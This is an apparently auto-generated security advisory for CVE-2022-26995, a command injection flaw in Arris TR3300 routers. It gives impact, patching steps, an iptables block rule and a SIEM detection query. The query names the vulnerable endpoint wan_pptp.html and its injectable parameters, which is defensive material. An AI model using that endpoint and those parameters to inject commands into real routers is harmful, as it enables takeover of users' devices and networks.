CVE-2022-26995
📋 TL;DR
CVE-2022-26995 is a critical command injection vulnerability in Arris TR3300 routers that allows attackers to execute arbitrary system commands via crafted HTTP requests to the PPTP configuration page. This affects Arris TR3300 router users running vulnerable firmware, potentially allowing complete device compromise. Attackers can gain full control over the router without authentication.
💻 Affected Systems
- Arris TR3300
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete router takeover leading to network compromise, credential theft, man-in-the-middle attacks, and persistent backdoor installation.
Likely Case
Router compromise allowing network traffic interception, DNS hijacking, and lateral movement to connected devices.
If Mitigated
Limited impact if router is behind firewall with restricted WAN access and regular patching.
🎯 Exploit Status
Exploit requires sending crafted HTTP POST requests to wan_pptp.html endpoint with malicious parameters.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v1.0.14 or later
Vendor Advisory: https://www.arris.com/support/security-advisories/
Restart Required: Yes
Instructions:
1. Log into router admin interface. 2. Navigate to firmware update section. 3. Check for updates. 4. Install latest firmware. 5. Reboot router.
🔧 Temporary Workarounds
Disable remote management
allDisable WAN access to router management interface
Navigate to Management > Access Control > Remote Management and disable
Block PPTP configuration access
linuxUse firewall rules to block access to wan_pptp.html endpoint
iptables -A INPUT -p tcp --dport 80 -m string --string "wan_pptp.html" --algo bm -j DROP
🧯 If You Can't Patch
- Isolate router on separate VLAN with strict firewall rules
- Implement network monitoring for suspicious HTTP requests to router management interface
🔍 How to Verify
Check if Vulnerable:
Check firmware version in router admin interface under Status > Device InfoCheck Version:
curl -s http://router-ip/status_deviceinfo.htm | grep FirmwareVerify Fix Applied:
Verify firmware version is v1.0.14 or later and test PPTP configuration page functionality📡 Detection & Monitoring
Log Indicators:
- HTTP POST requests to wan_pptp.html with unusual parameter values
- System command execution in router logs
- Unusual process creation
Network Indicators:
- Unusual outbound connections from router
- DNS queries to suspicious domains from router
- Unexpected port openings
SIEM Query:
source="router.log" AND (uri="*wan_pptp.html*" AND (param="*pptp_fix_ip*" OR param="*pptp_fix_mask*" OR param="*pptp_fix_gw*" OR param="*wan_dns1_stat*"))